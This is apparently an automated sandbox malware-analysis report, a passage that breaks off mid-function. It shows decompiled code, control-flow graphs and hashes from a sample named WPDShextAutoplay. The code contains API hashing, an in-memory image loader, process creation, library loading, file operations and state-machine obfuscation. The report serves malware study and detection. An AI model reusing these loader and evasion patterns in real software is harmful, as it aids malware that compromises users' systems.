                                                                                • Snapshot File: hcaresult_9_2_2a0000_WPDShextAutoplay.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CreateFile
                                                                                • String ID: ) `3$) `3$6w:$6w:$=
                                                                                • API String ID: 823142352-4124229693
                                                                                • Opcode ID: 42cc0307ca8b2d6dbc19f3cde93561c950e34f85bace781cc50ca16004237487
                                                                                • Instruction ID: 7458b1dea5ab337597e3b92ffe97000defc8724dd5e1423664bc1696470450ab
                                                                                • Opcode Fuzzy Hash: 42cc0307ca8b2d6dbc19f3cde93561c950e34f85bace781cc50ca16004237487
                                                                                • Instruction Fuzzy Hash: 4E611771A283129FD714DF28C54962FBBE5ABE5714F00881DF4998B290EFB4CD158F82
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00290D60, Relevance: 9.1, APIs: 6, Instructions: 124memoryCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 160 290d60-290dd5 call 290ed0 VirtualAlloc RtlMoveMemory 164 290ddb-290dde 160->164 165 290ebe-290ec4 160->165 164->165 166 290de4-290de6 164->166 166->165 167 290dec-290df0 166->167 167->165 169 290df6-290dfd 167->169 170 290eaf-290ebb 169->170 171 290e03-290e36 call 291140 RtlMoveMemory 169->171 171->165 175 290e3c-290e4a VirtualAlloc 171->175 176 290e89-290ea0 RtlFillMemory 175->176 177 290e4c-290e52 175->177 176->165 183 290ea2-290ea5 176->183 178 290e5a-290e68 177->178 179 290e54-290e56 177->179 178->165 180 290e6a-290e7d RtlMoveMemory 178->180 179->178 180->165 182 290e7f-290e83 180->182 182->165 184 290e85 182->184 183->165 185 290ea7-290ea9 183->185 184->176 185->170 185->171
                                                                                APIs
                                                                                  • Part of subcall function 00290FB0: RtlMoveMemory.NTDLL(00000000,?,00000040), ref: 00290F08
                                                                                  • Part of subcall function 00290FB0: RtlMoveMemory.NTDLL(00000000,?,000000F8), ref: 00290F3E
                                                                                  • Part of subcall function 00290FB0: RtlMoveMemory.NTDLL(00000000,00000000,000000F8), ref: 00290F7F
                                                                                • VirtualAlloc.KERNEL32(?,?,00000000,?,?), ref: 00290DB4
                                                                                • RtlMoveMemory.NTDLL(00000000,?,?), ref: 00290DC3
                                                                                  • Part of subcall function 00291140: lstrcpynW.KERNEL32(00000000,00000000,00000000,00000010,00290EFD,00000000), ref: 00291155
                                                                                • RtlMoveMemory.NTDLL(00000000,-00000018,00000028), ref: 00290E11
                                                                                • VirtualAlloc.KERNEL32(?,?,00000000,?,?), ref: 00290E3D
                                                                                • RtlMoveMemory.NTDLL(00000000,?,?), ref: 00290E6C
                                                                                • RtlFillMemory.KERNEL32(00000000,?,00000000), ref: 00290E98
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2287162356.0000000000290000.00000040.00000001.sdmp, Offset: 00290000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_290000_WPDShextAutoplay.jbxd
                                                                                Similarity
                                                                                • API ID: Memory$Move$AllocVirtual$Filllstrcpyn
                                                                                • String ID:
                                                                                • API String ID: 3581289920-0
                                                                                • Opcode ID: 98a03950a6b87b5ad15d3b8fee512a0dc4eebefe5bb086351cc2e195eb997952
                                                                                • Instruction ID: b1b73b58e43c1562788cb9fb49c39d3975ad00583a1e66f8611b7eec0de98871
                                                                                • Opcode Fuzzy Hash: 98a03950a6b87b5ad15d3b8fee512a0dc4eebefe5bb086351cc2e195eb997952
                                                                                • Instruction Fuzzy Hash: 1E31D6B1A14349AFDB54DB62CC84FAB73E9EBC8381F040D2CB98993351D635D8A1CB61
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 002A3780, Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 102COMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 186 2a3780-2a3793 187 2a37b0-2a37c5 186->187 188 2a3795-2a37ab call 2a3f00 call 2a3e60 186->188 193 2a37e2-2a37fa 187->193 194 2a37c7-2a37dd call 2a3f00 call 2a3e60 187->194 188->187 200 2a37fc-2a3812 call 2a3f00 call 2a3e60 193->200 201 2a3817-2a3832 193->201 194->193 200->201 207 2a384f-2a385e 201->207 208 2a3834-2a384a call 2a3f00 call 2a3e60 201->208 214 2a387b-2a38b4 207->214 215 2a3860-2a3876 call 2a3f00 call 2a3e60 207->215 208->207 221 2a38d1-2a38e2 SHFileOperationW 214->221 222 2a38b6-2a38cc call 2a3f00 call 2a3e60 214->222 215->214 222->221
                                                                                C-Code - Quality: 62%
                                                                                			E002A3780(void* __ecx, void* __edx, void* __edi, void* __esi) {
				char _v520;
				char _v528;
				char _v536;
				char _v1040;
				char _v1056;
				short _v1072;
				char* _v1076;
				char* _v1080;
				intOrPtr _v1084;
				intOrPtr* _t12;
				intOrPtr* _t14;
				intOrPtr* _t16;
				intOrPtr* _t18;
				intOrPtr* _t20;
				signed int _t26;
				void* _t36;
				void* _t63;
				void* _t66;
				void* _t69;
				void* _t70;
				void* _t71;
				void* _t72;
				struct _SHFILEOPSTRUCTW* _t73;

				_t70 =  &_v1072;
				_t12 =  *0x2addc0;
				_t66 = __ecx;
				_t63 = __edx;
				if(_t12 == 0) {
					_t12 = E002A3E60(_t36, E002A3F00(0xc6fbcd74), 0x7e0ae558, _t69);
					 *0x2addc0 = _t12;
				}
				 *_t12( &_v1072, 0, 0x1e);
				_t14 =  *0x2addc0;
				_t71 = _t70 + 0xc;
				if(_t14 == 0) {
					_t14 = E002A3E60(_t36, E002A3F00(0xc6fbcd74), 0x7e0ae558, _t69);
					 *0x2addc0 = _t14;
				}
				 *_t14( &_v1040, 0, 0x208);
				_t16 =  *0x2addc0;
				_t72 = _t71 + 0xc;
				if(_t16 == 0) {
					_t16 = E002A3E60(_t36, E002A3F00(0xc6fbcd74), 0x7e0ae558, _t69);
					 *0x2addc0 = _t16;
				}
				 *_t16( &_v520, 0, 0x208);
				_t18 =  *0x2ae298;
				_t73 = _t72 + 0xc;
				if(_t18 == 0) {
					_t18 = E002A3E60(_t36, E002A3F00(0x9bab0b12), 0xba782e65, _t69);
					 *0x2ae298 = _t18;
				}
				 *_t18( &_v1040, _t66);
				_t20 =  *0x2ae298;
				if(_t20 == 0) {
					_t20 = E002A3E60(_t36, E002A3F00(0x9bab0b12), 0xba782e65, _t69);
					 *0x2ae298 = _t20;
				}
				 *_t20( &_v528, _t63);
				_v1084 = 1;
				_v1080 =  &_v1056;
				_v1076 =  &_v536;
				_v1072 = 0xe14;
				if( *0x2ae30c == 0) {
					 *0x2ae30c = E002A3E60(_t36, E002A3F00(0xd9518805), 0x262a6194, _t69);
				}
				_t26 = SHFileOperationW(_t73); // executed
				asm("sbb eax, eax");
				return  ~_t26 + 1;
			}


























                                                                                0x002a3785
                                                                                0x002a3780
                                                                                0x002a378c
                                                                                0x002a378f
                                                                                0x002a3793
                                                                                0x002a37a6
                                                                                0x002a37ab
                                                                                0x002a37ab
                                                                                0x002a37b9
                                                                                0x002a37bb
                                                                                0x002a37c0
                                                                                0x002a37c5
                                                                                0x002a37d8
                                                                                0x002a37dd
                                                                                0x002a37dd
                                                                                0x002a37ee
                                                                                0x002a37f0
                                                                                0x002a37f5
                                                                                0x002a37fa
                                                                                0x002a380d
                                                                                0x002a3812
                                                                                0x002a3812
                                                                                0x002a3826
                                                                                0x002a3828
                                                                                0x002a382d
                                                                                0x002a3832
                                                                                0x002a3845
                                                                                0x002a384a
                                                                                0x002a384a
                                                                                0x002a3855
                                                                                0x002a3857
                                                                                0x002a385e
                                                                                0x002a3871
                                                                                0x002a3876
                                                                                0x002a3876
                                                                                0x002a3884
                                                                                0x002a388a
                                                                                0x002a3892
                                                                                0x002a389d
                                                                                0x002a38a6
                                                                                0x002a38b4
                                                                                0x002a38cc
                                                                                0x002a38cc
                                                                                0x002a38d5
                                                                                0x002a38d9
                                                                                0x002a38e2

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2287225432.00000000002A1000.00000020.00000001.sdmp, Offset: 002A0000, based on PE: true
                                                                                • Associated: 00000009.00000002.2287178032.00000000002A0000.00000004.00000001.sdmp Download File
                                                                                • Associated: 00000009.00000002.2287302605.00000000002AD000.00000004.00000001.sdmp Download File
                                                                                • Associated: 00000009.00000002.2287339879.00000000002AF000.00000002.00000001.sdmp Download File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_2a0000_WPDShextAutoplay.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: FileOperation
                                                                                • String ID: X~$X~$X~
                                                                                • API String ID: 3080627654-3258893172
                                                                                • Opcode ID: 289398ca47f6d911a55808ef36195ab52e412de9ceddc29eefcf87ced11b4a19
                                                                                • Instruction ID: d31d6a8369846ee6c8c40c3b24a15bc1925c972550852fb192e35c4046eea612
                                                                                • Opcode Fuzzy Hash: 289398ca47f6d911a55808ef36195ab52e412de9ceddc29eefcf87ced11b4a19
                                                                                • Instruction Fuzzy Hash: 0431BE71A203014FDB14EB79EC0576BB7EAAB96704F00492DB816CB282FF34DA158B91
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 002A7120, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 107libraryCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 283 2a7120 284 2a7125-2a712a 283->284 285 2a7130 284->285 286 2a71b4-2a71b9 284->286 287 2a7233-2a7248 call 2a34c0 285->287 288 2a7136-2a713b 285->288 289 2a71bb 286->289 290 2a7207-2a720c 286->290 311 2a724a-2a7260 call 2a3f00 call 2a3e60 287->311 312 2a7265-2a7278 LoadLibraryW 287->312 291 2a713d 288->291 292 2a7190-2a7195 288->292 294 2a71ee-2a7202 call 2a7080 289->294 295 2a71bd-2a71c2 289->295 296 2a720e-2a7222 call 2a7080 290->296 297 2a7227-2a722c 290->297 301 2a717a-2a718e call 2a7080 291->301 302 2a713f-2a7144 291->302 292->297 298 2a719b-2a71af call 2a7080 292->298 294->284 304 2a71c4-2a71c9 295->304 305 2a71d5-2a71e9 call 2a7080 295->305 296->284 297->284 300 2a7232 297->300 298->284 301->284 309 2a7146-2a714b 302->309 310 2a7164-2a7178 call 2a7080 302->310 304->297 313 2a71cb-2a71d0 304->313 305->284 309->297 318 2a7151-2a7162 call 2a7080 309->318 310->284 311->312 322 2a727a-2a7290 call 2a3f00 call 2a3e60 312->322 323 2a7295-2a72a0 312->323 313->284 318->284 322->323 334 2a72bd-2a72c5 323->334 335 2a72a2-2a72b8 call 2a3f00 call 2a3e60 323->335 335->334
                                                                                C-Code - Quality: 85%
                                                                                			E002A7120(void* __ebx) {
				void* _t2;
				struct HINSTANCE__* _t8;
				intOrPtr* _t9;
				intOrPtr* _t11;
				void* _t21;
				intOrPtr _t23;
				void* _t48;
				WCHAR* _t51;
				void* _t53;
				void* _t54;
				void* _t55;

				_t21 = __ebx;
				_t2 = 0x291da748;
				goto L1;
				do {
					while(1) {
						L1:
						_t54 = _t2 - 0x1a8031ec;
						if(_t54 > 0) {
							break;
						}
						if(_t54 == 0) {
							_t51 = E002A34C0(0x2ad830);
							__eflags =  *0x2add1c;
							if( *0x2add1c == 0) {
								 *0x2add1c = E002A3E60(_t21, E002A3F00(0x9bab0b12), 0xe4b28d97, _t53);
							}
							_t8 = LoadLibraryW(_t51);
							_t23 =  *0x2ae548; // 0x367e98
							 *(_t23 + 0x4c) = _t8;
							_t9 =  *0x2ae494;
							__eflags = _t9;
							if(_t9 == 0) {
								_t9 = E002A3E60(_t21, E002A3F00(0x9bab0b12), 0x7facde30, _t53);
								 *0x2ae494 = _t9;
							}
							_t48 =  *_t9();
							_t11 =  *0x2adf30;
							__eflags = _t11;
							if(_t11 == 0) {
								_t11 = E002A3E60(_t21, E002A3F00(0x9bab0b12), 0x5010a54d, _t53);
								 *0x2adf30 = _t11;
							}
							return  *_t11(_t48, 0, _t51);
						} else {
							_t55 = _t2 - 0x185e9846;
							if(_t55 > 0) {
								__eflags = _t2 - 0x18843476;
								if(__eflags != 0) {
									goto L21;
								} else {
									E002A7080(_t21, 0x2ad7a0, 4, __eflags);
									_t2 = 0x2eb73d4f;
									continue;
								}
							} else {
								if(_t55 == 0) {
									E002A7080(_t21, 0x2ad8f0, 2, __eflags);
									_t2 = 0x9da2520;
									continue;
								} else {
									if(_t2 == 0x9da2520) {
										E002A7080(_t21, 0x2ad800, 3, __eflags);
										_t2 = 0x18843476;
										continue;
									} else {
										_t57 = _t2 - 0x15a7f569;
										if(_t2 != 0x15a7f569) {
											goto L21;
										} else {
											E002A7080(_t21, 0x2ad860, 0, _t57);
											_t2 = 0x39797244;
											continue;
										}
									}
								}
							}
						}
						L30:
					}
					__eflags = _t2 - 0x2eb73d4f;
					if(__eflags > 0) {
						__eflags = _t2 - 0x39797244;
						if(__eflags != 0) {
							goto L21;
						} else {
							E002A7080(_t21, 0x2ad890, 1, __eflags);
							_t2 = 0x185e9846;
							goto L1;
						}
					} else {
						if(__eflags == 0) {
							E002A7080(_t21, 0x2ad7e0, 5, __eflags);
							_t2 = 0x22a44863;
							goto L1;
						} else {
							__eflags = _t2 - 0x22a44863;
							if(__eflags == 0) {
								E002A7080(_t21, 0x2ad8c0, 6, __eflags);
								_t2 = 0x1a8031ec;
								goto L1;
							} else {
								__eflags = _t2 - 0x291da748;
								if(__eflags != 0) {
									goto L21;
								} else {
									_t2 = 0x15a7f569;
									goto L1;
								}
							}
						}
					}
					goto L30;
					L21:
					__eflags = _t2 - 0x21acdd7e;
				} while (__eflags != 0);
				return _t2;
				goto L30;
			}














                                                                                0x002a7120
                                                                                0x002a7120
                                                                                0x002a7120
                                                                                0x002a7125
                                                                                0x002a7125
                                                                                0x002a7125
                                                                                0x002a7125
                                                                                0x002a712a
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x002a7130
                                                                                0x002a723f
                                                                                0x002a7246
                                                                                0x002a7248
                                                                                0x002a7260
                                                                                0x002a7260
                                                                                0x002a7266
                                                                                0x002a7268
                                                                                0x002a726e
                                                                                0x002a7271
                                                                                0x002a7276
                                                                                0x002a7278
                                                                                0x002a728b
                                                                                0x002a7290
                                                                                0x002a7290
                                                                                0x002a7297
                                                                                0x002a7299
                                                                                0x002a729e
                                                                                0x002a72a0
                                                                                0x002a72b3
                                                                                0x002a72b8
                                                                                0x002a72b8
                                                                                0x002a72c5
                                                                                0x002a7136
                                                                                0x002a7136
                                                                                0x002a713b
                                                                                0x002a7190
                                                                                0x002a7195
                                                                                0x00000000
                                                                                0x002a719b
                                                                                0x002a71a5
                                                                                0x002a71aa
                                                                                0x00000000
                                                                                0x002a71aa
                                                                                0x002a713d
                                                                                0x002a713d
                                                                                0x002a7184
                                                                                0x002a7189
                                                                                0x00000000
                                                                                0x002a713f
                                                                                0x002a7144
                                                                                0x002a716e
                                                                                0x002a7173
                                                                                0x00000000
                                                                                0x002a7146
                                                                                0x002a7146
                                                                                0x002a714b
                                                                                0x00000000
                                                                                0x002a7151
                                                                                0x002a7158
                                                                                0x002a715d
                                                                                0x00000000
                                                                                0x002a715d
                                                                                0x002a714b
                                                                                0x002a7144
                                                                                0x002a713d
                                                                                0x002a713b
                                                                                0x00000000
                                                                                0x002a7130
                                                                                0x002a71b4
                                                                                0x002a71b9
                                                                                0x002a7207
                                                                                0x002a720c
                                                                                0x00000000
                                                                                0x002a720e
                                                                                0x002a7218
                                                                                0x002a721d
                                                                                0x00000000
                                                                                0x002a721d
                                                                                0x002a71bb
                                                                                0x002a71bb
                                                                                0x002a71f8
                                                                                0x002a71fd
                                                                                0x00000000
                                                                                0x002a71bd
                                                                                0x002a71bd
                                                                                0x002a71c2
                                                                                0x002a71df
                                                                                0x002a71e4
                                                                                0x00000000
                                                                                0x002a71c4
                                                                                0x002a71c4
                                                                                0x002a71c9
                                                                                0x00000000
                                                                                0x002a71cb
                                                                                0x002a71cb
                                                                                0x00000000
                                                                                0x002a71cb
                                                                                0x002a71c9
                                                                                0x002a71c2
                                                                                0x002a71bb
                                                                                0x00000000
                                                                                0x002a7227
                                                                                0x002a7227
                                                                                0x002a7227
                                                                                0x002a7232
                                                                                0x00000000

                                                                                APIs
                                                                                • LoadLibraryW.KERNEL32(00000000,?,3251FEFE,002A68AC), ref: 002A7266
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2287225432.00000000002A1000.00000020.00000001.sdmp, Offset: 002A0000, based on PE: true
                                                                                • Associated: 00000009.00000002.2287178032.00000000002A0000.00000004.00000001.sdmp Download File
                                                                                • Associated: 00000009.00000002.2287302605.00000000002AD000.00000004.00000001.sdmp Download File
                                                                                • Associated: 00000009.00000002.2287339879.00000000002AF000.00000002.00000001.sdmp Download File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_2a0000_WPDShextAutoplay.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: LibraryLoad
                                                                                • String ID: Dry9$Dry9
                                                                                • API String ID: 1029625771-121480178
                                                                                • Opcode ID: e774f2dda613381394f51b27477a0fcec9aa20280993a37dc58a999a804cf480
                                                                                • Instruction ID: 50d51ca11c67c9d71592c58a1f0fda2d6d5badf725a5219fac3a9d05a386fc25
                                                                                • Opcode Fuzzy Hash: e774f2dda613381394f51b27477a0fcec9aa20280993a37dc58a999a804cf480
                                                                                • Instruction Fuzzy Hash: 1031E620B3C10147DA28AEB95C9433E51EA9BB3304F200076F456CBB55DD26CD324BDA
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 002A4B70, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 87processCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 343 2a4b70-2a4b80 344 2a4b9d-2a4bba 343->344 345 2a4b82-2a4b98 call 2a3f00 call 2a3e60 343->345 350 2a4bbc-2a4bd2 call 2a3f00 call 2a3e60 344->350 351 2a4bd7-2a4bf5 CreateProcessW 344->351 345->344 350->351 354 2a4c73-2a4c7a 351->354 355 2a4bf7-2a4bfd 351->355 357 2a4bff-2a4c13 355->357 358 2a4c14-2a4c1b 355->358 359 2a4c38-2a4c45 358->359 360 2a4c1d-2a4c33 call 2a3f00 call 2a3e60 358->360 367 2a4c62-2a4c72 359->367 368 2a4c47-2a4c5d call 2a3f00 call 2a3e60 359->368 360->359 368->367
                                                                                C-Code - Quality: 60%
                                                                                			E002A4B70(void* __ebx, WCHAR* __ecx, WCHAR* __edx, void* __ebp, int _a4, intOrPtr _a12) {
				struct _STARTUPINFOW _v72;
				struct _PROCESS_INFORMATION _v88;
				intOrPtr* _t9;
				int _t12;
				intOrPtr* _t15;
				intOrPtr* _t17;
				WCHAR* _t44;
				WCHAR* _t45;

				_t46 = __ebp;
				_t26 = __ebx;
				_t9 =  *0x2addc0;
				_t45 = __edx;
				_t44 = __ecx;
				if(_t9 == 0) {
					_t9 = E002A3E60(__ebx, E002A3F00(0xc6fbcd74), 0x7e0ae558, __ebp);
					 *0x2addc0 = _t9;
				}
				 *_t9( &_v72, 0, 0x44);
				_v72.cb = 0x44;
				if( *0x2ae21c == 0) {
					 *0x2ae21c = E002A3E60(_t26, E002A3F00(0x9bab0b12), 0xbd6cc871, _t46);
				}
				_t12 = CreateProcessW(_t44, _t45, 0, 0, _a4, 0, 0, 0,  &_v72,  &_v88); // executed
				if(_t12 == 0) {
					return 0;
				} else {
					if(_a12 == 0) {
						_t15 =  *0x2ade3c;
						if(_t15 == 0) {
							_t15 = E002A3E60(_t26, E002A3F00(0x9bab0b12), 0x20de7595, _t46);
							 *0x2ade3c = _t15;
						}
						 *_t15(_v88.hProcess);
						_t17 =  *0x2ade3c;
						if(_t17 == 0) {
							_t17 = E002A3E60(_t26, E002A3F00(0x9bab0b12), 0x20de7595, _t46);
							 *0x2ade3c = _t17;
						}
						 *_t17(_v88.hProcess);
						return 1;
					} else {
						asm("movdqu xmm0, [esp+0x8]");
						asm("movdqu [eax], xmm0");
						return 1;
					}
				}
			}











                                                                                0x002a4b70
                                                                                0x002a4b70
                                                                                0x002a4b70
                                                                                0x002a4b79
                                                                                0x002a4b7c
                                                                                0x002a4b80
                                                                                0x002a4b93
                                                                                0x002a4b98
                                                                                0x002a4b98
                                                                                0x002a4ba6
                                                                                0x002a4bb0
                                                                                0x002a4bba
                                                                                0x002a4bd2
                                                                                0x002a4bd2
                                                                                0x002a4bf1
                                                                                0x002a4bf5
                                                                                0x002a4c7a
                                                                                0x002a4bf7
                                                                                0x002a4bfd
                                                                                0x002a4c14
                                                                                0x002a4c1b
                                                                                0x002a4c2e
                                                                                0x002a4c33
                                                                                0x002a4c33
                                                                                0x002a4c3c
                                                                                0x002a4c3e
                                                                                0x002a4c45
                                                                                0x002a4c58
                                                                                0x002a4c5d
                                                                                0x002a4c5d
                                                                                0x002a4c66
                                                                                0x002a4c72
                                                                                0x002a4bff
                                                                                0x002a4bff
                                                                                0x002a4c05
                                                                                0x002a4c13
                                                                                0x002a4c13
                                                                                0x002a4bfd

                                                                                APIs
                                                                                • CreateProcessW.KERNEL32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,?,?), ref: 002A4BF1
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2287225432.00000000002A1000.00000020.00000001.sdmp, Offset: 002A0000, based on PE: true
                                                                                • Associated: 00000009.00000002.2287178032.00000000002A0000.00000004.00000001.sdmp Download File
                                                                                • Associated: 00000009.00000002.2287302605.00000000002AD000.00000004.00000001.sdmp Download File
                                                                                • Associated: 00000009.00000002.2287339879.00000000002AF000.00000002.00000001.sdmp Download File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_2a0000_WPDShextAutoplay.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CreateProcess
                                                                                • String ID: D$X~
                                                                                • API String ID: 963392458-2090554203
                                                                                • Opcode ID: 8197b8f98488e442369611ef9baa291d12e45f1a460b11d0b9eaece44cf12bf7
                                                                                • Instruction ID: 450440b919d7842f7203f3816a59a8899a0fab28b9cffa069cb2286b72f73596
                                                                                • Opcode Fuzzy Hash: 8197b8f98488e442369611ef9baa291d12e45f1a460b11d0b9eaece44cf12bf7
                                                                                • Instruction Fuzzy Hash: 6521D1317203025BEB14EF7ADC41B6B77A6ABD3704F00442DB559CB2A1FE70C9259B51
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 002A30A0, Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 165memoryCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 457 2a30a0-2a30b6 458 2a30ba-2a30bf 457->458 459 2a30c0-2a30c5 458->459 460 2a30cb 459->460 461 2a3201-2a3206 459->461 462 2a31ed-2a31f1 460->462 463 2a30d1-2a30d6 460->463 464 2a3208-2a320d 461->464 465 2a3245-2a324c 461->465 466 2a32f6-2a3300 462->466 467 2a31f7-2a31fc 462->467 468 2a31da-2a31e8 463->468 469 2a30dc-2a30e1 463->469 470 2a32ab-2a32b3 464->470 471 2a3213-2a3218 464->471 472 2a3269-2a3274 465->472 473 2a324e-2a3264 call 2a3f00 call 2a3e60 465->473 467->459 468->459 474 2a31a0-2a31a8 469->474 475 2a30e7-2a30ec 469->475 478 2a32d3-2a32f3 470->478 479 2a32b5-2a32cd call 2a3f00 call 2a3e60 470->479 476 2a321a-2a3228 call 2a3d00 471->476 477 2a322d-2a3232 471->477 490 2a3291-2a329f RtlAllocateHeap 472->490 491 2a3276-2a328c call 2a3f00 call 2a3e60 472->491 473->472 484 2a31aa-2a31c2 call 2a3f00 call 2a3e60 474->484 485 2a31c8-2a31d5 474->485 475->477 482 2a30f2-2a319b 475->482 476->458 477->459 486 2a3238-2a3242 477->486 478->466 479->478 482->458 484->485 485->458 490->466 498 2a32a1-2a32a6 490->498 491->490 498->458
                                                                                C-Code - Quality: 71%
                                                                                			E002A30A0() {
				void* __ebx;
				void* __ecx;
				void* __ebp;
				void* _t61;
				intOrPtr* _t62;
				void* _t65;
				intOrPtr _t93;
				intOrPtr* _t95;
				intOrPtr _t107;
				intOrPtr* _t116;
				void* _t127;
				void* _t128;
				intOrPtr _t129;
				signed int _t134;
				void* _t135;
				void* _t136;

				_t93 =  *((intOrPtr*)(_t135 + 0xc));
				_t61 = 0x11f367c2;
				_t134 =  *(_t135 + 0x10);
				_t129 =  *((intOrPtr*)(_t135 + 0x14));
				_t127 =  *(_t135 + 0x18);
				while(1) {
					L1:
					do {
						while(1) {
							L2:
							_t136 = _t61 - 0x12466c01;
							if(_t136 > 0) {
								break;
							}
							if(_t136 == 0) {
								if(_t93 !=  *(_t135 + 0x18)) {
									L29:
									return 1;
								} else {
									_t61 = 0x2f21cdd2;
									continue;
								}
							} else {
								if(_t61 == 0x7a26146) {
									_t61 =  ==  ? 0x2f21cdd2 : 0x12466c01;
									continue;
								} else {
									if(_t61 == 0x8928514) {
										_t95 =  *0x2ae1cc;
										if(_t95 == 0) {
											_t95 = E002A3E60(_t93, E002A3F00(0x55ab7d30), 0x815a9da3, _t134);
											 *0x2ae1cc = _t95;
										}
										_t129 =  *_t95(_t134 + 0x2c);
										_t61 = 0x39d78901;
										while(1) {
											L1:
											goto L2;
										}
									} else {
										if(_t61 != 0x11f367c2) {
											goto L18;
										} else {
											 *(_t135 + 0x18) = 0x2e7c;
											 *(_t135 + 0x18) = 0x3e0f83e1 *  *(_t135 + 0x18) >> 0x20 >> 4;
											 *(_t135 + 0x18) =  *(_t135 + 0x18) >> 7;
											 *(_t135 + 0x18) = 0x2f149903 *  *(_t135 + 0x18) >> 0x20 >> 4;
											 *(_t135 + 0x18) =  *(_t135 + 0x18) + 0xffff1475;
											 *(_t135 + 0x18) =  *(_t135 + 0x18) * 0x15;
											 *(_t135 + 0x18) =  *(_t135 + 0x18) >> 2;
											 *(_t135 + 0x18) = 0x22b63cbf *  *(_t135 + 0x18) >> 0x20 >> 4;
											 *(_t135 + 0x18) =  *(_t135 + 0x18) ^ 0x8ee7705c;
											 *(_t135 + 0x10) = 0xa461;
											 *(_t135 + 0x10) =  *(_t135 + 0x10) << 0xe;
											 *(_t135 + 0x10) =  *(_t135 + 0x10) * 8 -  *(_t135 + 0x10) << 2;
											_t61 = 0x8928514;
											 *(_t135 + 0x10) = 0x51eb851f *  *(_t135 + 0x10) >> 0x20 >> 3;
											 *(_t135 + 0x10) =  *(_t135 + 0x10) + 0xffffb6ab;
											 *(_t135 + 0x10) =  *(_t135 + 0x10) ^ 0x88f30986;
											while(1) {
												L1:
												goto L2;
											}
										}
									}
								}
							}
							L30:
						}
						if(_t61 == 0x2f21cdd2) {
							_t62 =  *0x2ae494;
							if(_t62 == 0) {
								_t62 = E002A3E60(_t93, E002A3F00(0x9bab0b12), 0x7facde30, _t134);
								 *0x2ae494 = _t62;
							}
							_t128 =  *_t62();
							if( *0x2add18 == 0) {
								 *0x2add18 = E002A3E60(_t93, E002A3F00(0x9bab0b12), 0x9ff0609c, _t134);
							}
							_t65 = RtlAllocateHeap(_t128, 8, 0x24c); // executed
							_t127 = _t65;
							if(_t127 == 0) {
								goto L29;
							} else {
								_t61 = 0x35eaa088;
								goto L1;
							}
						} else {
							if(_t61 == 0x35eaa088) {
								_t116 =  *0x2ae43c;
								if(_t116 == 0) {
									_t116 = E002A3E60(_t93, E002A3F00(0x9bab0b12), 0x2df4d385, _t134);
									 *0x2ae43c = _t116;
								}
								 *_t116(_t127 + 0x3c, _t134 + 0x2c, (_t129 - _t134 - 0x2c >> 1) + 1);
								_t107 =  *((intOrPtr*)(_t135 + 0x1c));
								 *(_t127 + 0x2c) =  *(_t107 + 0x1c);
								 *((intOrPtr*)(_t107 + 0xc)) =  *((intOrPtr*)(_t107 + 0xc)) + 1;
								 *(_t107 + 0x1c) = _t127;
								goto L29;
							} else {
								if(_t61 != 0x39d78901) {
									goto L18;
								} else {
									_t93 = E002A3D00(_t129);
									_t61 = 0x7a26146;
									while(1) {
										L1:
										goto L2;
									}
								}
							}
						}
						goto L30;
						L18:
					} while (_t61 != 0x100ad7b4);
					return 1;
					goto L30;
				}
			}



















                                                                                0x002a30a2
                                                                                0x002a30a6
                                                                                0x002a30ac
                                                                                0x002a30b1
                                                                                0x002a30b6
                                                                                0x002a30ba
                                                                                0x002a30ba
                                                                                0x002a30c0
                                                                                0x002a30c0
                                                                                0x002a30c0
                                                                                0x002a30c0
                                                                                0x002a30c5
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x002a30cb
                                                                                0x002a31f1
                                                                                0x002a32f9
                                                                                0x002a3300
                                                                                0x002a31f7
                                                                                0x002a31f7
                                                                                0x00000000
                                                                                0x002a31f7
                                                                                0x002a30d1
                                                                                0x002a30d6
                                                                                0x002a31e5
                                                                                0x00000000
                                                                                0x002a30dc
                                                                                0x002a30e1
                                                                                0x002a31a0
                                                                                0x002a31a8
                                                                                0x002a31c0
                                                                                0x002a31c2
                                                                                0x002a31c2
                                                                                0x002a31ce
                                                                                0x002a31d0
                                                                                0x002a30ba
                                                                                0x002a30ba
                                                                                0x00000000
                                                                                0x002a30ba
                                                                                0x002a30e7
                                                                                0x002a30ec
                                                                                0x00000000
                                                                                0x002a30f2
                                                                                0x002a30f2
                                                                                0x002a310d
                                                                                0x002a3111
                                                                                0x002a311f
                                                                                0x002a3123
                                                                                0x002a3130
